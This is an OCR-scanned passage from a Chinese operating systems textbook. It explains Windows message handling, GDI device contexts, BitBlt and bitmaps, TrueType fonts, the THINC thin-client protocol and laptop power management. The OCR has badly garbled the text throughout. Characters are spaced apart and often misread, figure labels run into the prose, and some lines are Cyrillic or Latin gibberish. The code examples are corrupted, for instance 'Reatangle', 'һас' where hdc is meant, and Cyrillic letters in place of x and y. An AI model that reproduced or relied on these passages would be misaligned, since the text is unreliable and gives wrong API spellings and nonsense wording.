被 拉 下 ， 对 话 框 和 工具 提示 可 能 会 覆盖 窗口 的 某 一 部 分 ， 如 此 等 等 。 当 这 些 项 目 被 移 开 后 ， 窗 口 必须 重 
绘 。Windows 告 知 一 个 程序 重 绘 窗口 的 方法 是 发 送 WM_PAINT 消 息 。 作 为 一 种 友好 的 姿态 ， 它 还 会 提供 
窗口 的 哪 一 部 分 曾经 被 覆盖 的 信息 ， 这 样 程序 就 更 加 容易 重新 生成 窗口 的 那 一 部 分 而 不 必 重 绘 整个 窗口 。 

Windows 有 两 种 方法 可 以 让 一 个 程序 做 某 些 事情 。 一 种 方法 是 投递 一 条 消息 到 其 消息 队列 。 这 种 方 
法 用 于 键盘 输入 、 鼠 标 输入 以 及 定时 器 到 时 。 另 一 种 方法 是 发 送 一 条 消息 到 窗口 ， 从 而 使 Windows 直 接 
调用 WndProc 本 身 。 这 一 方法 用 于 所 有 其 他 事件 。 由 于 当 一 条 消息 完全 被 处 理 后 Windows 会 得 到 通报 ， 
这 样 Windows 就 能 够 避免 在 前 一 个 调用 完成 前 产生 新 的 调用 ， 由 此 可 以 避免 竞争 条 件 。 

还 有 许多 其 他 消息 类 型 。 当 一 个 不 期 望 的 消息 到 达 时 为 了 避免 异常 行为 ， 最 好 在 WndProc 的 结尾 处 
调用 DefWindowProc， 让 默认 处 理 过 程 处 理 其 他 情形 。 

总 之 ，Windows 程 序 通常 创建 一 个 或 多 个 窗口 ， 每 个 窗口 具有 一 个 类 对 象 。 与 每 个 程序 相关 联 的 是 
一 个 消息 队列 和 一 组 处 理 过 程 。 最 终 ， 程 序 的 行为 由 到 来 的 事件 驱动 ， 这 些 事件 由 处 理 过 程 来 处 理 。 与 
UNIX 采 用 的 过 程 化 观点 相 比 ， 这 是 一 个 完全 不 同 的 世界 观 模型 。 

对 屏幕 的 实际 绘图 是 由 包含 几 百 个 过 程 的 程序 包 处 理 的 ， 这 些 过 程 拥 在 一 起 形成 了 GDI (Graphics 
Device Interface， 图 形 设 备 接口 ) 。 它 能 够 处 理 文本 和 各 种 类 型 的 图 形 ， 并 且 被 设计 成 与 平台 和 设备 无 
关 的 。 在 一 个 程序 可 以 在 窗口 中 绘图 ( 即 绘画 ) 之 前 ， 它 需要 获取 一 个 设备 上 下 文 (device context): 
设备 上 下 文 是 一 个 内 部 数据 结构 ， 包 含 窗口 的 属性 ， 诸 如 当前 字体 、 文 本 颜色 、 背 景 颜色 等 。 大 多 数 
GDI 调 用 使 用 设备 上 下 文 ， 不 管 是 为 了 绘图 ， 还 是 为 了 获取 或 设置 属性 。 

有 许 许多 多 的 方法 可 用 来 获取 设备 上 下 文 。 下 面 是 一 个 获取 并 使 用 设备 上 下 文 的 简单 例子 : 

hdc=GetDC(hwnd); 

TextOut(hdc, х, у, psText, iLength); 

ReleaseDC(hwnd, һас); 

第 一 条 语句 获取 一 个 设备 上 下 文 的 句柄 hdc。 第 二 条 语句 使 用 设备 上 下 文 在 屏幕 上 写 一 行文 本 ， 该 
语句 设 定 了 字符 串 开始 处 的 (x, у) 坐标 、 一 个 指向 字符 串 本 身 的 指针 以 及 字符 串 的 长 度 。 第 三 个 调用 
释放 设备 上 下 文 ， 表 明 程序 在 当时 已 通过 了 绘图 操作 。 注 意 ， hdc 的 使 用 方式 与 UNIX 的 文件 描述 符 相 类 
似 。 还 需要 注意 的 是 ，ReleaseDC 包 含 元 余 的 信息 《使 用 hdc 就 可 以 惟一 地 指定 一 个 窗口 )。 使 用 不 具有 
实际 价值 的 元 余 信息 在 Windows 中 是 很 常见 的 。 

另 一 个 有 趣 的 注意 事项 是 ， 当 hdc 以 这 样 的 方式 被 获取 时 ， 程 序 只 能 够 写 窗口 的 客户 区 ， 而 不 能 写 
标题 条 和 窗口 的 其 他 部 分 。 在 内 部 ， 在 设备 上 下 文 的 数据 结构 中 ， 维 护 着 一 个 修剪 区 域 。 在 修剪 区 域 之 
外 的 任何 绘图 操作 都 将 被 忽略 。 然 而 ， 存 在 着 另 一 种 获取 设备 上 下 文 的 方法 GetWindowDC ， 它 将 修剪 
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区 域 设置 为 整个 窗口 。 其 余 的 调用 以 其 他 的 方法 限定 修剪 区 域 。 拥 有 多 种 调用 做 几乎 相同 的 事情 是 
Windows 的 另 一 个 特性 。 

GDI 的 完全 论述 超出 了 这 里 讨论 的 范围 。 对 于 感 兴趣 的 读者 ， 上 面 引 用 的 参考 文献 提供 了 补充 的 信 
息 。 然 而 ， 关 于 GDI 可 能 还 值得 再 说 几 句 话 ， 因 为 GDI 是 如 此 之 重要 。GDI 具 有 各 种 各 样 的 过 程 调用 以 
获取 和 释放 设备 上 下 文 ， 获 取 关 于 设备 上 下 文 的 信息 ， 获 取 和 设置 设备 上 下 文 的 属性 (例如 背景 颜色 ) ， 
使 用 GDI 对 象 (例如 画笔 、 画 刷 和 字体 ， 其 中 每 个 对 象 都 有 自己 的 属性 )。 最 后 ， 当 然 存 在 许多 实际 在 
屏幕 上 绘图 的 GDI 调 用 。 

绘图 过 程 分 成 四 种 类 型 : 绘制 直线 和 曲线 、 绘 制 填充 区 域 、 管 理 位 图 以 及 显示 文本 。 我 们 在 上 面 看 
到 了 绘制 文本 的 例子 ， 所 以 让 我 们 快速 地 看 看 其 他 类 型 之 一 。 调 用 

Rectangle(hdc, xleft, ytop, xright, ybottom); 


将 绘制 一 个 填充 的 入 形 ， 它 的 左上 角 和 右 下 衣 分 别 是 《xleft, ytop) 和 (aright, ybottom)。 例 如 ， 

Reatangle(hdc,2,1,6,4); 
将 绘制 一 个 如 图 5-41 所 示 的 矩形 。 线 宽 和 颜色 以 及 壤 充 闫 色 取 
自 设备 上 下 文 。 其 他 的 GDI 调 用 在 形式 上 是 类 似 的 。 

4. 位 图 

GDI 过 程 是 矢量 图 形 学 的 实例 。 它 们 用 于 在 屏幕 上 放置 几 
何 图 形 和 文本 。 它 们 能 够 十 分 容易 地 缩放 到 较 大 和 较 小 的 屏 闪 
(如 果 屏 幕 上 的 像素 数 是 相同 的 ) 。 它 们 还 是 相对 设备 无 关 的 。 
一 组 对 GDI 过 程 的 调用 可 以 聚集 在 一 个 文件 中 ， 描 述 一 个 复杂 的 
图 面 。 这 梯 的 文件 称 为 Windows 元 文件 《metafile)， 广 泛 地 用 于 
从 一 个 Windows 程 序 到 另 一 个 Windows 程 序 传送 图 画 。 这 样 的 文 о, 使 用 Rectange 给 制 拓 形 的 例 
ed T. А ЧЕ 

许多 Windows 程 序 允许 用 户 复制 图 画 (或 一 部 分 )》 ЗЕЕ доњу E, АЛИН ТО 
入 另 一 个 各 序 并 且 由 贴 间 贴 板 的 内 容 到 另 一 个 文档 中 。 做 这 件 事 的 一 各 方法 是 由 第 一 个 程序 将 图 画 表 示 
为 Windows 元 文件 并 且 将 其 以 -wmft 格 起 放 在 区 贴 板 上 。 此外， 还 有 其 他 的 方法 做 这 件 事 。 

并 不 是 计算 机 处 理 的 所 有 图 像 都 能 够 使 用 矢量 图 形 学 来 生成 。 例 如 ， 照 片 和 视频 就 不 使 用 矢量 图 形 
学 。 反之， 这 些 项 目 可 以 通过 在 图 像 上 相关 一 层 网 格 扫 找 输 入 。 每 一 个 风格 方块 的 平均 红 、 绿 、 政 到 值 被 
采样 并 且 保存 为 一 个 像素 的 值 。 这 样 的 文件 称 为 位 图 bitmap)。Windows 中 有 大 量 的 工具 用 于 处 理 位 图 。 

位 图 的 另 一 个 用 途 是 用 于 文本 .在 革 种 字体 中 表示 一 个 特殊 字符 的 一 种 方法 是 将 其 表示 为 小 的 位 图。 
于 是 往 屏幕 上 添加 文本 就 变 成 移动 位 图 的 事情 . 

使 用 位 图 的 一 种 一般 方法 是 通过 调用 BitBh 过 程 ， 该 过 程 调用 如 下 

BitBlt(dsthdc, dx, dy, wid, ht, srchdc, sx, sy, rasterop); 

TERMER, ARMAN ESAN RRAN) 的 
一 个 矩形 中 。 前 三 个 参数 设 定 目标 窗口 和 位 置 ， 然 后 是 宽度 和 高 座 ， 接 下 来 是 源 窗 口 和 位 置 。 注 意 ， 每 
个 窗口 都 有 其 自己 的 坐标 系 ，(0，0) 在 窗口 的 左上 角 处 。 最 后 一个 参数 将 在 下 面 杠 述 。 

BitBlt(hdc2, 1, 2, 5, 7, hdcl, 2, 2, SRCCOPY); 

Ваа -429 Я, ВАВА НО Т5 TEREMT, ENRE, 

除了 复制 位 图 外 ，BiBM 还 可 以 做 很 多 事情 。 最 后 一 个 参数 提供 了 执行 布尔 运算 的 可 能 ， 从 而 可 以 
将 源 位 图 与 目标 位 图 合并 在 一 起 。 例 如 ， 源 位 图 可 以 与 目标 位 图 执行 或 运算 ， 从 而 融入 目标 位 图 ， 源 位 
图 还 可 以 与 朋 标 位 图 执行 异 或 运算 ， 访 运算 保持 了 源 位 图 和 目标 位 图 的 特征 。 

位 图 具有 的 一 个 问题 是 它们 不 能 缩放 。8 х 12 方 框 内 的 一 个 字符 在 640 x 480 的 显示 器 上 看 起 来 是 适 
度 的 。 然 而 ， 如 果 该 位 图 以 每 英寸 200 点 复制 到 10 200 位 x 13 200 位 的 打印 页 面 上 ， 那 么 字符 宽度 (SR 
Ж) 为 811200 英 二 或 017mm。 此 外 ， 在 具有 不 同 彩色 属性 的 设备 之 间 进 行 复制 ， 或 者 在 音色 设备 与 彩色 
设备 之 间 进 行 复制 禾 果 并 不 理想 。 
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窗 D2 一 > 窗 D2 一 > 


а) b) 
图 5-42 使 用 BitBlt 复 制 位 图 a) 复制 前 ，b) 复制 后 


由 于 这 样 的 缘故 ，Windows 还 支持 一 个 称 为 DIB (Device Independent Bitmap， 设 备 无 关 的 位 图 ) 
的 数据 结构 。 采 用 这 种 格式 的 文件 使 用 扩展 名 .bmp。 这 些 文件 在 像素 之 前 具有 文件 与 信息 头 以 及 一 个 版 
色 表 ， 这 样 的 信息 使 得 在 不 同 的 设备 之 间 移动 位 图 十 分 容易 。 

5. 字体 

在 Windows 3.1 版 之 前 的 版 本 中 ， 字 符 表 示 为 位 图 ， 并 且 使 用 BitBlt 复 制 到 屏幕 上 或 者 打印 机 上 。 这 
样 做 的 问题 是 ， 正 如 我 们 刚刚 看 到 的 ， 在 屏幕 上 有 意义 的 位 图 对 于 打印 机 来 说 太 小 了 。 此 外 ， 对 于 每 一 
尺寸 的 每 个 字符 ， 需 要 不 同 的 位 图 。 换 名 话说 ， 
给 定 字符 A 的 10 点 阵 字 型 的 位 图 ， 没 有 办 法 计 200 abcdefgh 
算 它 的 12 点 阵 字 型 。 因 为 每 种 字体 的 每 一 个 字 
符 可 能 都 需要 从 4 点 到 120 点 范围 内 的 各 种 尺 
寸 ， 所 以 需要 的 位 图 的 数目 是 巨大 的 。 整 个 系 заро b d Ё H 
统 对 于 文本 来 说 简直 是 太 笨重 了 。 а С е g 


该 问题 的 解决 办 法 是 TrueType 字 体 的 引 


入 ，TrueType 字 体 不 是 位 图 而 是 字符 的 轮廓 。 
每 个 TrueType 字 符 是 通过 围绕 其 周 界 的 一 系列 81ре 
点 来 定义 的 ， 所 有 的 点 都 是 相对 于 (0，0) 原 а С е g 
点 。 使 用 这 一 系统 ， 放 大 或 者 缩小 字符 是 十 分 
容易 的 ， 必 须要 做 的 全 部 事情 只 是 将 每 个 坐标 
乘 以 相同 的 比例 因子 。 采 用 这 种 方法 , 图 5-43 不 同 点 阵 尺 寸 的 字符 轮廓 的 一 些 例子 
TrueType 字 符 可 以 放大 或 者 缩小 到 任意 的 点 阵 尺 寸 ， 甚 至 是 分 数 点 阵 尺 寸 。 一 旦 给 定 了 适当 的 尺寸 ， 各 
个 点 可 以 使 用 幼儿 园 教 的 著名 的 逐 点 连 算法 连接 起 来 (注意 现代 幼儿 园 为 了 更 加 光滑 的 结果 而 使 用 曲线 
尺 )。 轮 廓 完成 之 后 ， 就 可 以 填充 字符 了 。 图 5-43 给 出 了 某 些 字符 缩放 到 三 种 不 同 点 阵 尺 寸 的 一 个 例子 。 
一 旦 填充 的 字符 在 数学 形式 上 是 可 用 的 ， 就 可 以 对 它 进行 栅 格 化 ， 也 就 是 说 ， 以 任何 期 望 的 分 辩 率 
将 其 转换 成 位 图 。 通 过 首先 缩放 然后 棚 格 化 ， 我 们 可 以 肯定 显示 在 屏幕 上 的 字符 与 出 现在 打印 机 上 的 字 
符 将 是 尽 可 能 接近 的 ， 差 别 只 在 于 量化 误差 。 为 了 进一步 改进 质量 ， 可 以 在 每 个 字符 中 嵌入 表明 如 何 进 
行 栅 格 化 的 线索 。 例 如 ， 字 母 T 顶 端的 两 个 衬 线 应 该 是 完全 相同 的 ， 否 则 由 于 伟人 误差 可 能 就 不 是 这 样 
的 情况 了 。 


57 着 客户 机 

多 年 来 ， 主 流 计算 范式 一 直 在 中 心 化 计算 和 分 散 化 计算 之 间 振 荡 。 最 早 的 计算 机 (例如 ENIAC) 虽 
然 是 庞然大物 ， 但 实际 上 是 个 人 计算 机 ， 因 为 一 次 只 有 一 个 人 能 够 使 用 它 。 然 后 出 现 的 是 分 时 系统 ， 在 
分 时 系统 中 许多 远程 用 户 在 简单 的 终端 上 共享 一 个 大 型 的 中 心计 算 机 。 接 下 来 是 PC 时 代 ， 在 这 一 阶段 用 
户 再 次 拥有 他 们 自己 的 个 人 计算 机 。 

虽然 分 散 化 的 PC 模型 具有 长 处 ， 但 是 它 也 有 着 某 些 严重 的 不 利之 处 ， 人 们 刚刚 开始 认真 思考 这 些 
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不 利之 处 。 或 许 最 大 的 问题 是 ， 每 台 PC 机 都 有 一 个 大 容量 的 硬盘 以 及 复杂 的 软件 必须 维护 。 例 如 ， 当 操 
作 系 统 的 一 个 新 版 本 发 布 时 ， 必 须 做 大 量 的 工作 分 别 在 每 台 机 器 上 进行 升级 。 在 大 多 数 公 司 中 ， 做 这 类 
软件 维护 的 劳动 力 成 本 大 大 高 于 实际 的 硬件 与 软件 成 本 。 对 于 家 庭 用 户 而 言 ， 在 技术 上 劳动 力 是 免费 的 ， 
但 是 很 少 有 人 能 够 正确 地 做 这 件 事 ， 并 且 更 少 有 人 乐于 做 这 件 事 。 对 于 一 个 中 心 化 的 系统 ， 只 有 一 台 或 
几 台 机 器 必须 升级 ， 并 且 有 专家 班子 做 这 些 工 作 。 

一 个 相关 的 问题 是 ， 用 户 应 该 定期 地 备份 他 们 的 几 吉 字 节 的 文件 系统 ， 但 是 很 少 有 用 户 这 样 做 。 当 
灾难 袭 来 时 ， 相 随 的 将 是 仰天 长 叹 和 捧 胸 顿 足 。 对 于 一 个 中 心 化 的 系统 ， 自 动 化 的 磁带 机 器 人 在 每 天 夜 
里 都 可 以 做 备份 。 

中 心 化 系统 的 另 一 个 长 处 是 资源 共享 更 加 容易 。 一 个 系统 具有 256 个 远程 用 户 ， 每 个 用 户 拥有 
256MB RAM， 在 大 多 数 时 间 这 个 系统 的 这 些 RAM 大 多 是 空闲 的 ， 然 而 某 些 用 户 临 时 需要 大 量 的 RAM 但 
是 却 得 不 到 ， 因 为 RAM 在 别人 的 PC 上 。 对 于 一 个 具有 64GB RAM 的 中 心 化 系统 ， 这 样 的 事情 决 不 会 发 
生 。 同 样 的 论据 对 于 磁盘 空间 和 其 他 资源 也 是 有 效 的 。 

最 后 ， 我 们 将 开始 考察 从 以 PC 为 中 心 的 计算 到 以 Web 为 中 心 的 计算 的 转移 。 一 个 领域 是 电子 邮件 ， 
在 该 领域 中 这 种 转移 是 长 远 的 。 人 们 过 去 获取 投 送 到 他 们 家 庭 计算 机 上 的 电子 邮件 ， 并 且 在 家 庭 计算 机 
上 陪读。 今天， 许多 人 登录 到 Gmail、Hotmail 或 者 Yahoo 上 ， 并 且 在 那里 阅读 他 们 的 邮件 。 下 一 步 人 们 
会 登录 到 其 他 网 站 中 ， 进 行 字 处 理 、 建 立 电子 数据 表 以 及 做 其 他 过 去 需要 PC 软件 才能 做 的 事情 。 最 后 其 
至 有 可 能 人 们 在 自己 的 PC 上 运行 的 惟一 软件 是 一 个 Web 浏 览 器 ， 或 许 甚至 没有 软件 。 

一 个 合理 的 结论 大 概 是 : 大 多 数 用 户 想 要 高 性 能 的 交互 式 计算 ， 但 是 实在 不 想 管理 一 台 计算 机 。 这 
一 结论 导致 研究 人 员 重 新 研究 了 分 时 系统 使 用 的 哑 终 端 (现在 文雅 地 称 为 瘦 客 户 机 (thin client))， 它 们 
符合 现代 终端 的 期 望 。X 是 这 一 方向 的 一 个 步 又 并 且 专 用 的 X 终 端 一 度 十 分 流行 ， 但 是 它们 现在 已 经 失 
宠 ， 因 为 它们 的 价格 与 PC 相仿 ， 能 做 的 事情 更 少 ， 并 且 仍 然 需要 某 些 软件 维护 。 圣 杯 (holy grail) 应 访 
是 一 个 高 性 能 的 交互 式 计算 系统 ， 在 该 系统 中 用 户 的 机 器 根本 就 没有 软件 。 十 分 有 趣 的 是 ， 这 一 目标 是 
可 以 达到 的 。 下 面 我 们 将 描述 一 个 这 样 的 瘦 客户 机 系统 ， 称 为 THINC， 它 是 由 哥伦比亚 大 学 的 研究 人 员 


开发 的 (Baratto 等 人 ，2005，Kim 等 人 ，2006， 

канн, 2006); Га ТТР ТҮРТ 
此 处 的 基本 思想 是 从 客户 机 剥离 一 切 智能 和 软 Copy ALCEE EISA 

件 ， 只 是 将 其 用 作 一 台 显 示 器 ， 使 所 有 计算 包括 Hem ПЕЕ 

建立 待 显示 的 位 图 ) 都 在 服务 器 端 完成 。 客 户 机 和 РАП 以 给 定 的 像素 模式 填充 一 个 区 域 

服务 器 之 间 的 协议 只 是 通知 显示 器 如 何 更 新 视频 Bitmap | 使 用 位 图 图 像 填充 一 个 区 域 


RAM， 再 无 其 他 。 两 端 之 间 的 协议 中 使 用 了 五 条 合 
令 ， 它 们 列 在 图 5-44 中 。 图 5-44 THINC 协 议 显示 命令 

现在 我 们 将 考察 这 些 命令 。Raw 用 于 传输 像素 数据 并 且 将 它们 逐 字 地 显示 在 屏幕 上 。 原 则 上 ， 这 是 
惟一 需要 的 命令 。 其 他 命令 只 是 为 了 优化 。 

Copy 指 示 显 示 器 从 其 视频 RAM 的 一 个 部 分 移动 数据 到 另 一 个 部 分 。 这 对 于 滚 卷 屏幕 而 不 必 重新 伟 
输 所 有 数据 是 有 用 的 。 

Sfill 以 单一 的 像素 值 填充 屏幕 的 一 个 区 域 。 许 多 屏幕 具有 某 种 颜色 的 一 致 的 背景 ， 该 命令 用 于 首先 
生成 背景 ， 然 后 可 以 绘制 文本 、 图 标 和 其 他 项 目 。 

Pfi 在 某 个 区 域 上 复制 一 个 模式 。 它 还 可 以 用 于 背景 ， 但 是 基 些 背景 比 单一 颜色 要 复杂 -一些 ， 在 这 
种 情况 下 ， 该 命令 可 以 完成 工作 。 

最 后 ，Bitmap 也 是 用 于 绘制 区 域 ， 但 是 具有 前 景色 和 背景 色 。 总 而 言 之 ， 这 些 是 非常 简单 的 命令 ， 
在 客户 端 需要 非常 少 的 软件 。 所 有 建立 位 图 填充 屏幕 的 复杂 操作 都 是 在 服务 器 上 完成 的 。 为 了 改进 效率 ， 
多 条 命令 可 以 聚集 成 单一 的 数据 包 ， 通 过 网 络 从 服务 器 传送 到 客户 机 。 

在 服务 器 端 ， 图 形 程序 使 用 高 级 命令 以 绘制 屏幕 。 这 些 命令 被 THINC 软 件 截获 ， 并 且 盎 译 成 可 以 发 
送 到 客户 机 的 命令 。 命 令 可 能 要 重 排序 以 改进 效率 。 

论文 通过 在 距 客户 机 10 ~ 10 000km 距 离 的 服务 器 上 运行 众多 的 常用 应 用 程序 ， 给 出 了 大 量 的 性 能 
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测量 。 一 般 而 言 ， 性 能 超过 了 其 他 广域网 系统 ， 即 使 对 于 实时 视频 也 是 如 此 。 关 于 更 多 的 信息 ， 请 读者 
参阅 论文 。 


58 电源 管理 

第 一 代 通 用 电子 计算 机 ENIAC 具 有 180 00 个 电子 管 并 且 消 耗 140 000 瓦 的 电力 。 结 果 ， 它 迅速 积累 
起 非 同一 般 的 电费 账单 。 晶 体 管 发 明 后 ， 电 力 的 使 用 量 戏剧 性 地 下 降 ， 并 且 计算 机 行业 失去 了 在 电力 需 
求 方面 的 兴趣 。 然 而 ， 如 今 电 源 管理 由 于 若干 原因 又 像 过 去 一 样 成 为 焦点 ， 并 且 操 作 系统 在 这 里 扮演 着 
重要 的 角色 。 

我 们 从 桌面 PC 开始 讨论 。 课 面 PC 通常 具有 200 瓦 的 电源 (其 效率 一 般 是 85%，15% 进 来 的 能 量 损 失 
为 热量 )。 如 果 全 世界 1 亿 台 这 样 的 机 器 同时 开机 ， 合 起 来 它们 要 用 掉 20 000 兆 瓦 的 电力 。 这 是 20 座 中 等 
规模 的 核电 站 的 总 产 出 。 如 果 电 力 需求 能 够 削减 一 半 ， 我 们 就 可 以 削减 10 座 核电 站 。 从 环保 的 角度 看 
前 减 10 座 核电 站 (或 等 价 数目 的 矿物 燃料 电站 ) 是 一 个 巨大 的 胜利 ， 非 常 值得 追求 。 

另 一 个 要 着 重 考虑 电源 的 场合 是 电池 供电 的 计算 机 ， 包 括 笔记 本 电脑 、 掌 上 机 以 及 Web 便 签 夭 等 
问题 的 核心 是 电池 不 能 保存 足够 的 电荷 以 持续 非常 长 的 时 间 ， 至 多 也 就 是 几 个 小 时 。 此 外 ， 尽 管 电池 公 
司 、 计 算 机 公司 和 消费 性 电子 产品 公司 进行 了 巨大 的 研究 努力 ， 但 进展 仍然 缓慢 。 对 于 一 个 已 经 习惯 于 
每 18 个 月 性 能 翻 一 番 (摩尔 定律 ) 的 产业 来 说 ， 毫 无 进展 就 像 是 违背 了 物理 定律 ， 但 这 就 是 现状 。 因 此 
使 计算 机 使 用 较 少 的 能 量 因而 现 有 的 电池 能 够 持续 更 长 的 时 间 就 高 悬 在 每 个 人 的 议事 日 程 之 上 。 操 作 系 
统 在 这 里 扮演 着 主要 的 角色 ， 我 们 将 在 下 面 看 到 这 一 点 。 

在 最 低 的 层次 ， 硬 件 厂商 试图 使 他 们 的 电子 装置 具有 更 高 的 能 量 效率 。 使 用 的 技术 包括 减少 晶体 管 
的 尺寸 、 利 用 动态 电压 调节 、 使 用 低 摆 幅 并 隔 热 的 总 线 以 及 类 似 的 技术 。 这 些 内 容 超出 了 本 书 的 范围 
感 兴趣 的 读者 可 以 在 Venkatachalam 和 Franz (2005) 的 论文 中 找到 很 好 的 综述 。 

存在 两 种 碱 少 能 基 消 耗 的 一 般 方法 。 第 一 种 方法 是 当 计算 机 的 某 些 部 件 (主要 是 LO 设备 ) 不 用 的 
时 候 由 操作 系统 关闭 它们 ， 因 为 关闭 的 设备 使 用 的 能 量 很 少 或 者 不 使 用 能 量 。 第 二 种 方法 是 应 用 程序 使 
用 较 少 的 能 量 ， 这 样 为 了 延长 电池 时 间 可 能 会 降低 用 户 体验 的 质量 。 我 们 将 依次 看 -- 看 这 些 方法 ， 但 是 
首先 就 电源 使 用 方面 谈 一 谈 硬件 设计 。 


5.8.1 硬件 问题 

电池 一 般 分 为 两 种 类 型 ;一 次 性 使 用 的 和 可 再 充电 的 。 一 次 性 使 用 的 电池 (AAA、AA 与 D 电 池 ) 
可 以 用 来 运转 掌上 设备 ， 但 是 没有 足够 的 能 量 为 具有 大 面积 发 光 屏幕 的 笔记 本 电脑 供电 。 相 反 ， 可 再 充 
电 的 电池 能 够 存储 足够 的 能 量 为 笔记 本 电 凡 供电 几 个 小 时 。 在 可 再 充电 的 电池 中 ， 镍 镭 电池 曾经 占据 主 
导 地 位 ， 但 是 它们 后 来 让 位 给 了 锦 氨 电池 ， 镍 氨 电 字 持 续 的 时 间 更 长 并 且 当 它们 最 后 被 抛弃 时 不 如 锦 饥 
电池 污染 环境 那么 严重 。 锂 电池 更 好 一 些 ， 并 且 不 需要 首先 完全 耗 尽 就 可 以 再 充电 ， 但 是 它们 的 容量 同 
样 非常 有 限 。 

大 多 数 计算 机 厂商 对 于 电池 节约 采取 的 一 般 措施 是 将 CPU、 内 存 以 及 IO 设备 设计 成 具有 多 种 状态 ; 
工作 、 睡 眠 、 休 眠 和 关闭 。 要 使 用 设备 ， 它 必须 处 于 工作 状态 。 当 设备 在 短 时 间 内 暂时 不 使 用 时 ， 可 以 
将 其 置 于 睡眠 状态 ， 这 样 可 以 减少 能 量 消耗 。 当 设备 在 一 个 较 长 的 时 间 间隔 内 不 使 用 时 ， 可 以 将 其 置 于 
休 卢 状态， 这样 可 以 进一步 碱 少 能 量 消耗 。 这 里 的 权衡 是 ， 使 一 个 设备 脱离 休眠 状态 常常 比 使 一 个 设备 
脱离 睡眠 状态 花费 更 多 的 时 间 和 能 量 。 最 后 ， 当 一 个 设备 关闭 时 ， 它 什么 事情 也 不 做 并 且 也 不 消耗 电能 。 
并 非 所 有 的 设备 都 具有 这 些 状态 ， 但 是 当 它们 具有 这 些 状态 时 ， 应 该 由 操作 系统 在 正确 的 时 机 管理 状态 
的 变迁 。 

某 些 计算 机 具有 两 个 甚至 三 个 电源 按钮 。 这 些 按钮 之 一 可 以 将 整个 计算 机 置 于 睡眠 状态 ， 通 过 键 和 
一 个 字符 或 者 移动 鼠标 ， 能 够 从 该 状态 快速 地 唤醒 计算 机 。 另 一 个 按钮 可 以 将 计算 机 置 于 休眠 状态 ， 从 
该 状态 唤醒 计算 机 花费 的 时 间 要 长 得 多 。 在 这 两 种 情况 下 ， 这 些 按钮 通常 除了 发 送 一 个 信号 给 操作 系统 
外 什么 也 不 做 ， 剩 下 的 事情 由 操作 系统 在 软件 中 处 理 。 在 某 些 国家 ， 依 照 法 律 ， 电 气 设备 必须 具有 一 个 
机 械 的 电源 开关 ， 出 于 安全 性 考虑 ， 该 开关 可 以 切断 电路 并 且 从 设备 撤去 电能 。 为 了 遵守 这 一 法 律 ， 可 
能 需要 另 一 个 开关 。 
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电源 管理 提出 了 操作 系统 必须 处 理 的 若干 问题 ， 其 中 许多 问题 涉及 资源 休眠 一 一 选择 性 地 、 临 时 性 
地 关闭 设备 ， 或 者 至 少 当 它们 空闲 时 减少 它们 的 功率 消耗 。 必 须 回答 的 问题 包括 : 哪些 设备 能 够 被 控 
制 ? 它们 是 工作 的 还 是 关闭 的 ， 或 者 它们 具有 中 间 状 态 吗 ? 在 低 功 耗 状态 下 节省 了 多 少 电 能 ? 重启 设备 
消耗 能 量 吗 ? 当 进入 低 功 耗 状态 时 是 不 是 必须 保存 某 些 上 下 文 ? 返回 到 全 功 耗 状态 要 花费 多 长 时 间 ? 当 
然 ， 对 这 些 问题 的 回答 是 随 设备 而 变化 的 ， 所 以 操作 系统 必须 能 够 处 理 一 个 可 能 性 的 范围 。 

许多 研究 人 员 研 究 了 笔记 本 电脑 以 了 解 电能 。 一 


的 去 向 。Li 等 人 《1994) 测量 了 各 种 各 样 的 工作 Ба ЫРА (1994 | Loretta Smith (1998) 
负荷 ， 得 出 的 结论 如 图 5-45 所 示 。Lorch 和 Smith (сыр 12% ва] 
(1998) 在 其 他 机 器 上 进行 了 测量 ， 得 出 的 结论 авй а а 

如 图 5-45 所 示 。Weiser 等 人 (1994) 也 进行 了 测 ТЕЕ! 6%. 

量 ， 但 是 没有 发 表 数值 结果 。 这 些 结论 清楚 地 说 | 声卡 2% 

明 能 量 吸收 的 前 三 名 依次 是 显示 器 、 硬 盘 和 CPU。 [AF 05% 1% 

可 能 因为 测量 的 不 同 品牌 的 计算 机 确实 具有 不 同 ЖЕ 22% 

的 能 量 需求 ， 这 些 数字 并 不 紧密 地 吻合 ， 但 是 很 图 5-45 笔记 本 电脑 各 部 件 的 功率 消耗 


显然 ， 显 示 器 、 硬 盘 和 CPU 是 节约 能 量 的 目标 。 


5.8.2 操作 系统 问题 

操作 系统 在 能 量 管理 上 扮演 着 一 个 重要 的 角色 ， 它 控制 着 所 有 的 设备 ， 所 以 它 必 须 决定 关闭 什么 设 
备 以 及 何 时 关闭 。 如 果 它 关闭 了 一 个 设备 并 且 该 设备 很 快 再 次 被 用 户 需要 ， 可 能 在 设备 重启 时 存在 恼人 
的 延迟 。 另 一 方面 ， 如 果 它 等 待 了 太 长 的 时 间 才 关闭 设备 ， 能 量 就 白白 地 浪费 了 。 

这 里 的 技巧 是 找到 算法 和 试探 法 ， 让 操作 系统 对 关于 关闭 什么 设备 以 及 何 时 关闭 能 够 作出 良好 的 决 
策 。 问 题 是 “良好 ”是 高 度 主观 的 。 一 个 用 户 可 能 觉得 在 30s 未 使 用 计算 机 之 后 计算 机 要 花费 2s 的 时 间 
响应 击 键 是 可 以 接受 的 。 另 一 个 用 户 在 相同 的 条 件 下 可 能 会 发 出 一 连 串 的 诅咒 。 

1. 显示 器 

现在 我 们 来 看 一 看 能 量 预算 的 几 大 消耗 者 ， 考 虑 一 下 对 于 它们 能 够 做 些 什么 。 在 每 个 人 的 能 量 预 算 中 
最 大 的 项 目 是 显示 器 。 为 了 获得 明亮 而 清晰 的 图 像 ， 屏 幕 必 须 是 背光 照明 的 ， 这 样 会 消耗 大 量 的 能 量 。 许 
多 操作 系统 试图 通过 当 几 分 钟 的 时 间 没有 活动 时 关闭 显示 器 而 节省 能 量 。 通常 用 户 可 以 决定 关闭 的 时 间 间 
隔 ， 因 此 将 屏幕 频繁 地 熄灭 和 很 快 用 光电 池 之 间 的 折 中 推 回 给 用 户 (用户 可 能 实际 上 并 不 希望 这 样 )。 关 闭 
显示 器 是 一 个 睡眠 状态 ， 因 为 当 任意 键 被 敲 击 或 者 定点 设备 移动 时 ， 它 能 够 (从 视频 RAM) 即时 地 再 生 。 

Flinn 和 Satyanarayanan (2004) 提出 了 一 种 可 能 的 改进 。 他 们 建议 让 显示 器 由 若干 数目 的 区 域 组 成 ， 
这 些 区 域 能 够 独立 地 开启 和 关闭 。 在 图 5-46 中 ,我们 描述 了 16 个 区 域 ， 使 用 虚线 分 开 它们 。 当 光标 在 窗 
